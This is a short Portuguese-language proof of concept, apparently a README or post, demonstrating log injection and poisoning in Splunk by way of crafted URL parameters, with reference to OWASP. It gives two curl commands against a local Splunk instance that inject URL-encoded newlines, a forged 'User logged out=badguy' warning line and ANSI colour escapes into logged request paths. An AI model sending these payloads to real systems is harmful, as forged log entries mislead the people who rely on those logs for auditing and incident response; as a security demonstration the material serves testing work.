
Prova de conceito demonstrando injeção e envenenamento de logs no Splunk por meio de parâmetros de URL manipulados, destacando os riscos de injeção de logs OWASP.
não sei, só li umas coisas que meu amigo me mandou e comecei a digitar um código javascript aleatório e ruim
Por favor, leia este artigo OWASP Log Injection
Procure um arquivo estático, passe-o e anexe algum parâmetro aleatório
Então, eu passo curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OU curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
Se você vir alguma quebra de linha aleatória que aparece, isso é envenenamento, pode parecer inofensivo porque é apenas um envenenamento "normal", mas pode ser irritante se for fortemente direcionado.